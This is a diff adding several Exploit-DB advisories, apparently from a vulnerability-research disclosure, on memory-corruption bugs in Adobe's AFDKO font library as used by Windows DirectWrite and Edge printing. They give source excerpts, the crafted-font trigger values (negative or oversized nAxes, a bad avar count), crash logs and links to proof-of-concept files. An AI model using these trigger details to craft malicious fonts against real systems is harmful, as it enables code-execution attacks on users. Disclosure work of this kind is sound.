+    #5 0x509662 in cfrReadFont afdko/c/tx/source/tx.c:151:18
+    #6 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #7 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #8 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #9 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #10 0x7ffbfaea62b0 in __libc_start_main
+    #11 0x41e5b9 in _start
+
+Address 0x7ffe0355a7d8 is located in stack of thread T0 at offset 241624 in frame
+    #0 0x66eb8f in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2523
+
+  This frame has 2 object(s):
+    [32, 757896) 'h' (line 2524) <== Memory access at offset 241624 is inside this variable
+    [758160, 758376) 'Exception' (line 2586)
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: use-after-poison afdko/c/public/lib/source/t2cstr/t2cstr.c:992:49 in do_set_weight_vector_cube
+Shadow bytes around the buggy address:
+  0x1000406a34a0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a34b0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a34c0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a34d0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 00 f7 f7 f7 f7 00
+  0x1000406a34e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f7
+=>0x1000406a34f0: f7 f7 f7 00 00 00 00 00 f7 f7 f7[f7]f7 f7 f7 f7
+  0x1000406a3500: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a3510: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a3520: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a3530: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000406a3540: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==96231==ABORTING
+--- cut ---
+
+Where the t2cstr.c:992 line is:
+
+--- cut ---
+   992      int composeCnt = h->cube[h->cubeStackDepth].composeOpCnt;
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47087.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47088.txt b/exploits/windows/dos/47088.txt
new file mode 100644
index 000000000..7c3347d3f
--- /dev/null
+++ b/exploits/windows/dos/47088.txt
@@ -0,0 +1,165 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The vulnerability resides in the do_set_weight_vector_cube() function in afdko/c/public/lib/source/t2cstr/t2cstr.c, whose prologue is shown below:
+
+--- cut ---
+   985  static int do_set_weight_vector_cube(t2cCtx h, int nAxes) {
+   986      float dx, dy;
+   987      int i = 0;
+   988      int j = 0;
+   989      int nMasters = 1 << nAxes;
+   990      float NDV[kMaxCubeAxes];
+   991      int popCnt = nAxes + 3;
+   992      int composeCnt = h->cube[h->cubeStackDepth].composeOpCnt;
+   993      float *composeOps = h->cube[h->cubeStackDepth].composeOpArray;
+--- cut ---
+
+The "nAxes" argument may be controlled through the tx_SETWVN instruction:
+
+--- cut ---
+  1912                          case tx_SETWVN: {
+  1913                              int numAxes = (int)POP();
+  1914                              result = do_set_weight_vector_cube(h, numAxes);
+  1915                              if (result || !(h->flags & FLATTEN_CUBE))
+  1916                                  return result;
+--- cut ---
+
+Later in do_set_weight_vector_cube(), there is very little sanitization of "nAxes", and the function mostly assumes that the argument is valid. Setting it to a negative value will cause the following check to pass:
+
+--- cut ---
+  1022      if (composeCnt < (nAxes + 3))
+  1023          return t2cErrStackUnderflow;
+--- cut ---
+
+which enables us to execute the rest of the function with "nMasters" equal to an arbitrary power of 2, and "popCnt" set to an arbitrary negative value. This may lead to stack-based out-of-bounds reads and writes in the following loops:
+
+--- cut ---
+  1028          /* Pop all the current COMPOSE args off the stack. */
+  1029          for (i = popCnt; i < composeCnt; i++)
+  1030              composeOps[i - popCnt] = composeOps[i];
+[...]
+  1039
+  1040      /* Compute Weight Vector */
+  1041      for (i = 0; i < nMasters; i++) {
+  1042          h->cube[h->cubeStackDepth].WV[i] = 1;
+  1043          for (j = 0; j < nAxes; j++)
+  1044              h->cube[h->cubeStackDepth].WV[i] *= (i & 1 << j) ? NDV[j] : 1 - NDV[j];
+  1045      }
+  1046      /* Pop all the current COMPOSE args off the stack. */
+  1047      for (i = popCnt; i < composeCnt; i++)
+  1048          composeOps[i - popCnt] = composeOps[i];
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file calls do_set_weight_vector_cube(nAxes=-100000), causing AFDKO to perform largely out-of-bounds read/writes operations relative to the stack, which results in a SIGSEGV / ACCESS_VIOLATION crash of the client program in line 1030:
+
+--- cut ---
+  1028          /* Pop all the current COMPOSE args off the stack. */
+  1029          for (i = popCnt; i < composeCnt; i++)
+  1030              composeOps[i - popCnt] = composeOps[i];
+--- cut ---
+
+-----=====[ Crash logs ]=====-----
+
+Crash log of the "tx" 64-bit utility started as ./tx -cff <path to font file>:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000466f31 in do_set_weight_vector_cube (h=0x7ffffff60188, nAxes=-100000) at ../../../../../source/t2cstr/t2cstr.c:1030
+1030                composeOps[i - popCnt] = composeOps[i];
+(gdb) where
+#0  0x0000000000466f31 in do_set_weight_vector_cube (h=0x7ffffff60188, nAxes=-100000) at ../../../../../source/t2cstr/t2cstr.c:1030
+#1  0x0000000000460f3f in t2Decode (h=0x7ffffff60188, offset=19147) at ../../../../../source/t2cstr/t2cstr.c:1914
+#2  0x000000000045e224 in t2Decode (h=0x7ffffff60188, offset=23565) at ../../../../../source/t2cstr/t2cstr.c:1412
+#3  0x000000000045cb26 in t2cParse (offset=23565, endOffset=23574, aux=0x7156e8, gid=2, cff2=0x715118, glyph=0x6fd6e8, mem=0x7150b8)
+    at ../../../../../source/t2cstr/t2cstr.c:2591
+#4  0x000000000041371f in readGlyph (h=0x710380, gid=2, glyph_cb=0x6fd6e8) at ../../../../../source/cffread/cffread.c:2927
+#5  0x0000000000413495 in cfrIterateGlyphs (h=0x710380, glyph_cb=0x6fd6e8) at ../../../../../source/cffread/cffread.c:2966
+#6  0x0000000000405f11 in cfrReadFont (h=0x6f6010, origin=0, ttcIndex=0) at ../../../../source/tx.c:151
+#7  0x0000000000405c9e in doFile (h=0x6f6010, srcname=0x7fffffffdf17 "poc.otf") at ../../../../source/tx.c:429
+#8  0x000000000040532e in doSingleFileSet (h=0x6f6010, srcname=0x7fffffffdf17 "poc.otf")
+    at ../../../../source/tx.c:488
+#9  0x0000000000402f59 in parseArgs (h=0x6f6010, argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:558
+#10 0x0000000000401df2 in main (argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:1631
+(gdb) print i
+$1 = -99997
+(gdb) print popCnt
+$2 = -99997
+(gdb) print composeCnt
+$3 = 4
+(gdb)
+--- cut ---
+
+Crash log from the Microsoft Edge renderer process:
+
+--- cut ---
+(4378.f50): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!do_set_weight_vector_cube+0x16a:
+00007ff9`e87c0d82 8b01            mov     eax,dword ptr [rcx] ds:0000000b`2decf988=????????
+
+0:038> u
+DWrite!do_set_weight_vector_cube+0x16a:
+00007ff9`e87c0d82 8b01            mov     eax,dword ptr [rcx]
+00007ff9`e87c0d84 890491          mov     dword ptr [rcx+rdx*4],eax
+00007ff9`e87c0d87 488d4904        lea     rcx,[rcx+4]
+00007ff9`e87c0d8b 4883ef01        sub     rdi,1
+00007ff9`e87c0d8f 75f1            jne     DWrite!do_set_weight_vector_cube+0x16a (00007ff9`e87c0d82)
+00007ff9`e87c0d91 e900010000      jmp     DWrite!do_set_weight_vector_cube+0x27e (00007ff9`e87c0e96)
+00007ff9`e87c0d96 33d2            xor     edx,edx
+00007ff9`e87c0d98 4d8bd0          mov     r10,r8
+
+0:038> ? rsp
+Evaluate expression: 48015521648 = 0000000b`2df2b770
+
+0:038> !teb
+TEB at 0000000b2b0ae000
+    ExceptionList:        0000000000000000
+    StackBase:            0000000b2df40000
+    StackLimit:           0000000b2df2a000
+[...]
+
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 0000000b`2df2b770 00007ff9`e87c2b1f DWrite!do_set_weight_vector_cube+0x16a
+01 0000000b`2df2b800 00007ff9`e87c186e DWrite!t2Decode+0x15ab
+02 0000000b`2df2b940 00007ff9`e87c4a62 DWrite!t2Decode+0x2fa
+03 0000000b`2df2ba80 00007ff9`e87ac103 DWrite!t2cParse+0x28e
+04 0000000b`2df3b3e0 00007ff9`e87ae3f7 DWrite!readGlyph+0x12b
+05 0000000b`2df3b450 00007ff9`e87a2272 DWrite!cfrIterateGlyphs+0x37
+06 0000000b`2df3b4a0 00007ff9`e873157a DWrite!AdobeCFF2Snapshot+0x19a
+07 0000000b`2df3b9a0 00007ff9`e8730729 DWrite!FontInstancer::InstanceCffTable+0x212
+08 0000000b`2df3bb80 00007ff9`e873039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+09 0000000b`2df3bda0 00007ff9`e8715a4e DWrite!FontInstancer::CreateInstance+0x192
+0a 0000000b`2df3c100 00007ff9`f2df61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+0b 0000000b`2df3c190 00007ff9`f2de9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0c 0000000b`2df3c2b0 00007ff9`cd7750f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0d 0000000b`2df3c300 00007ff9`cd74fcb0 edgehtml!CDXPrintControl::Close+0x44
+0e 0000000b`2df3c350 00007ff9`cd7547ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0f 0000000b`2df3c380 00007ff9`cd62b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+10 0000000b`2df3c3b0 00007ff9`cd289175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+11 0000000b`2df3c3f0 00007ff9`cf5368f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47088.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47089.txt b/exploits/windows/dos/47089.txt
new file mode 100644
index 000000000..ecd804dd2
--- /dev/null
+++ b/exploits/windows/dos/47089.txt
@@ -0,0 +1,142 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.
+
+In this specific case, setting the CFR_FLATTEN_CUBE flag while interacting with AFDKO is required to trigger the bug. According to our analysis, DirectWrite currently doesn't specify this flag, but it still contains the do_set_weight_vector_cube() function including the vulnerable code. In case the code can be reached in a way we haven't considered, or the CFR_FLATTEN_CUBE flag is ever added in the future, we have opted to report the bug despite its apparent unreachability at this time.
+
+-----=====[ Description ]=====-----
+
+The bug resides in the do_set_weight_vector_cube() function in afdko/c/public/lib/source/t2cstr/t2cstr.c, with the following definition:
+
+--- cut ---
+   985  static int do_set_weight_vector_cube(t2cCtx h, int nAxes) {
+--- cut ---
+
+The nAxes parameter can be controlled through the tx_SETWVN instruction:
+
+--- cut ---
+  1912                          case tx_SETWVN: {
+  1913                              int numAxes = (int)POP();
+  1914                              result = do_set_weight_vector_cube(h, numAxes);
+  1915                              if (result || !(h->flags & FLATTEN_CUBE))
+  1916                                  return result;
+--- cut ---
+
+The assumption is that the number of axes specified by the fon't won't be greater than 9, as specified by the kMaxCubeAxes constant in afdko/c/public/lib/resource/txops.h:
+
+--- cut ---
+   194  #define kMaxCubeAxes 9
+--- cut ---
+
+However this assumption is never explicitly verified in do_set_weight_vector_cube(). As a result, if the FLATTEN_CUBE flag is set in h->flags, the following code will be executed:
+
+--- cut ---
+   989      int nMasters = 1 << nAxes;
+   990      float NDV[kMaxCubeAxes];
+[...]
+  1035      while (i < nAxes) {
+  1036          NDV[i] = (float)((100 + (long)composeOps[3 + i]) / 200.0);
+  1037          i++;
+  1038      }
+  1039
+  1040      /* Compute Weight Vector */
+  1041      for (i = 0; i < nMasters; i++) {
+  1042          h->cube[h->cubeStackDepth].WV[i] = 1;
+  1043          for (j = 0; j < nAxes; j++)
+  1044              h->cube[h->cubeStackDepth].WV[i] *= (i & 1 << j) ? NDV[j] : 1 - NDV[j];
+  1045      }
+--- cut ---
+
+If nAxes larger than 9 is specified, the local NDV[] buffer will be overflown in line 1036, followed by another buffer overflow in lines 1042 and 1044, as the WV[] array only consists of 2**9 elements, but the loops will try to write 2**10 or a larger power of 2 of values.
+
+According to our observations, one of the biggest clients of AFDKO, Microsoft DirectWrite, doesn't set the CFR_FLATTEN_CUBE flag while interacting with the library, and is therefore not affected by the vulnerability (because it follows a different path to compose_callback). In the standard "tx" tool, the flag can be toggled on with the "-cubef" argument:
+
+--- cut ---
+-cubef          flattens Cube source to a normal Type 1 font. Can be used with all output formats
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file triggers the bug by using the tx_SETWVN instruction to call do_set_weight_vector_cube(nAxes=16) in the CharString of the "A" glyph.
+
+-----=====[ Crash logs ]=====-----
+
+A crash log from the "tx" tool compiled with AddressSanitizer, run as ./tx -cubef -cff <path to font file>:
+
+--- cut ---
+=================================================================
+==119029==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xff934174 at pc 0x083112cc bp 0xff934128 sp 0xff934120
+WRITE of size 4 at 0xff934174 thread T0
+    #0 0x83112cb in do_set_weight_vector_cube afdko/c/public/lib/source/t2cstr/t2cstr.c:1036:16
+    #1 0x82f4112 in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1914:38
+    #2 0x82e4816 in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1412:34
+    #3 0x82da1c4 in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2591:18
+    #4 0x8194f84 in readGlyph afdko/c/public/lib/source/cffread/cffread.c:2927:14
+    #5 0x8194131 in cfrIterateGlyphs afdko/c/public/lib/source/cffread/cffread.c:2966:9
+    #6 0x8156184 in cfrReadFont afdko/c/tx/source/tx.c:151:18
+    #7 0x81556df in doFile afdko/c/tx/source/tx.c:429:17
+    #8 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #9 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #10 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #11 0xf7b9c275 in __libc_start_main
+    #12 0x806a590 in _start
+
+Address 0xff934174 is located in stack of thread T0 at offset 52 in frame
+    #0 0x83100ef in do_set_weight_vector_cube afdko/c/public/lib/source/t2cstr/t2cstr.c:985
+
+  This frame has 1 object(s):
+    [16, 52) 'NDV' (line 990) <== Memory access at offset 52 overflows this variable
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow afdko/c/public/lib/source/t2cstr/t2cstr.c:1036:16 in do_set_weight_vector_cube
+Shadow bytes around the buggy address:
+  0x3ff267d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff267e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff267f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff26800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff26810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x3ff26820: 00 00 00 00 00 00 00 00 f1 f1 00 00 00 00[04]f3
+  0x3ff26830: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff26840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff26850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff26860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x3ff26870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==119029==ABORTING
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47089.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47090.txt b/exploits/windows/dos/47090.txt
new file mode 100644
index 000000000..da52540dd
--- /dev/null
+++ b/exploits/windows/dos/47090.txt
@@ -0,0 +1,161 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.
+
+In this specific case, the uninitialized memory used in the vulnerable code originates from the client-provided allocator callback. According to our analysis the callback provided by DirectWrite zeroes out the returned memory by itself, which should reduce the impact of the bug to a NULL pointer dereference. However, in case the implementation of the allocator ever changes in the future, we have opted to report the bug despite its apparent low severity at this time, especially considering that the resulting primitive is the invocation of a function pointer loaded from the uninitialized address.
+
+-----=====[ Description ]=====-----
+
+The bug resides in the support of variable fonts, and specifically in the loading of the "avar" table. We're interested in the following structures (from source/varread/varread.c):
+
+--- cut ---
+    84  /* avar table */
+    85  struct var_avar_;
+    86  typedef struct var_avar_ *var_avar;
+    87
+[...]
+    91
+    92  /* avar table */
+    93
+    94  typedef struct axisValueMap_ {
+    95      Fixed fromCoord;
+    96      Fixed toCoord;
+    97  } axisValueMap;
+    98
+    99  typedef dnaDCL(axisValueMap, axisValueMapArray);
+   100
+   101  typedef struct segmentMap_ {
+   102      unsigned short positionMapCount;
+   103      axisValueMapArray valueMaps;
+   104  } segmentMap;
+   105
+   106  typedef dnaDCL(segmentMap, segmentMapArray);
+   107
+   108  struct var_avar_ {
+   109      unsigned short axisCount;
+   110      segmentMapArray segmentMaps;
+   111  };
+--- cut ---
+
+In other words, an "avar" structure contains a list of segment maps, each of which contains a list of value maps. The object is allocated and initialized in the var_loadavar() function. It is possible to bail out of the parsing in several places in the code:
+
+--- cut ---
+   297      if (table->length < AVAR_TABLE_HEADER_SIZE + (unsigned long)AVAR_SEGMENT_MAP_SIZE * avar->axisCount) {
+   298          sscb->message(sscb, "invalid avar table size or axis/instance count/size");
+   299          goto cleanup;
+   300      }
+   301
+   302      dnaINIT(sscb->dna, avar->segmentMaps, 0, 1);
+   303      if (dnaSetCnt(&avar->segmentMaps, DNA_ELEM_SIZE_(avar->segmentMaps), avar->axisCount) < 0)
+   304          goto cleanup;
+[...]
+   311          if (table->length < sscb->tell(sscb) - table->offset + AVAR_AXIS_VALUE_MAP_SIZE * seg->positionMapCount) {
+   312              sscb->message(sscb, "avar axis value map out of bounds");
+   313              goto cleanup;
+   314          }
+   315
+   316          dnaINIT(sscb->dna, seg->valueMaps, 0, 1);
+   317          if (dnaSetCnt(&seg->valueMaps, DNA_ELEM_SIZE_(seg->valueMaps), seg->positionMapCount) < 0)
+   318              goto cleanup;
+--- cut ---
+
+which leads to freeing the entire "avar" object:
+
+--- cut ---
+   339  cleanup:;
+   340      HANDLER
+   341      END_HANDLER
+   342
+   343      if (!success) {
+   344          var_freeavar(sscb, avar);
+   345          avar = 0;
+   346      }
+--- cut ---
+
+When a parsing error occurs, the object may be only partially initialized. However, the var_freeavar() function doesn't take it into account and unconditionally attempts to free all value maps lists inside of all segment maps lists:
+
+--- cut ---
+   255  static void var_freeavar(ctlSharedStmCallbacks *sscb, var_avar avar) {
+   256      if (avar) {
+   257          unsigned short i;
+   258
+   259          for (i = 0; i < avar->axisCount; i++) {
+   260              dnaFREE(avar->segmentMaps.array[i].valueMaps);
+   261          }
+   262          dnaFREE(avar->segmentMaps);
+   263
+   264          sscb->memFree(sscb, avar);
+   265      }
+   266  }
+--- cut ---
+
+In the code above, the data under avar->segmentMaps.array[i].valueMaps may be uninitialized. The dnaFREE() call translates to (source/dynarr/dynarr.c):
+
+--- cut ---
+   178  /* Free dynamic array object. */
+   179  void dnaFreeObj(void *object) {
+   180      dnaGeneric *da = (dnaGeneric *)object;
+   181      if (da->size != 0) {
+   182          dnaCtx h = da->ctx;
+   183          h->mem.manage(&h->mem, da->array, 0);
+   184          da->size = 0;
+   185      }
+   186  }
+--- cut ---
+
+In line 183, the "h" pointer contains uninitialized bytes. As it is used to fetch a function pointer to call, the condition is a serious security vulnerability. However, it is important to note that the implementation of dynamic arrays in AFDKO relies on an external memory allocator provided by the library user, and so, the feasibility of exploitation may also depend on it. For example, the allocator in Microsoft DirectWrite returns zero-ed out memory, making the bug currently non-exploitable through that attack vector.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file triggers the bug by declaring avar->axisCount as 1 and having seg->positionMapCount set to 0xffff. This causes the following sanity check to fail, leading to a crash while freeing resources:
+
+--- cut ---
+   311          if (table->length < sscb->tell(sscb) - table->offset + AVAR_AXIS_VALUE_MAP_SIZE * seg->positionMapCount) {
+   312              sscb->message(sscb, "avar axis value map out of bounds");
+   313              goto cleanup;
+   314          }
+--- cut ---
+
+-----=====[ Crash logs ]=====-----
+
+A crash log from the "tx" tool (part of AFDKO) compiled with AddressSanitizer, run as ./tx -cff <path to font file>:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x00000000007df58c in dnaFreeObj (object=0x606000000208) at ../../../../../source/dynarr/dynarr.c:183
+183             h->mem.manage(&h->mem, da->array, 0);
+(gdb) where
+#0  0x00000000007df58c in dnaFreeObj (object=0x606000000208) at ../../../../../source/dynarr/dynarr.c:183
+#1  0x00000000007e399a in var_freeavar (sscb=0x62a000004fa8, avar=0x6060000001a0) at ../../../../../source/varread/varread.c:260
+#2  0x00000000007e37be in var_loadavar (sfr=0x614000000240, sscb=0x62a000004fa8) at ../../../../../source/varread/varread.c:344
+#3  0x00000000007dfb5d in var_loadaxes (sfr=0x614000000240, sscb=0x62a000004fa8) at ../../../../../source/varread/varread.c:484
+#4  0x0000000000527f74 in cfrBegFont (h=0x62a000000200, flags=4, origin=0, ttcIndex=0, top=0x62c000000238, UDV=0x0)
+    at ../../../../../source/cffread/cffread.c:2681
+#5  0x000000000050928e in cfrReadFont (h=0x62c000000200, origin=0, ttcIndex=0) at ../../../../source/tx.c:137
+#6  0x0000000000508cc4 in doFile (h=0x62c000000200, srcname=0x7fffffffdf1f "poc.otf")
+    at ../../../../source/tx.c:429
+#7  0x0000000000506b2f in doSingleFileSet (h=0x62c000000200, srcname=0x7fffffffdf1f "poc.otf")
+    at ../../../../source/tx.c:488
+#8  0x00000000004fc91f in parseArgs (h=0x62c000000200, argc=2, argv=0x7fffffffdc30) at ../../../../source/tx.c:558
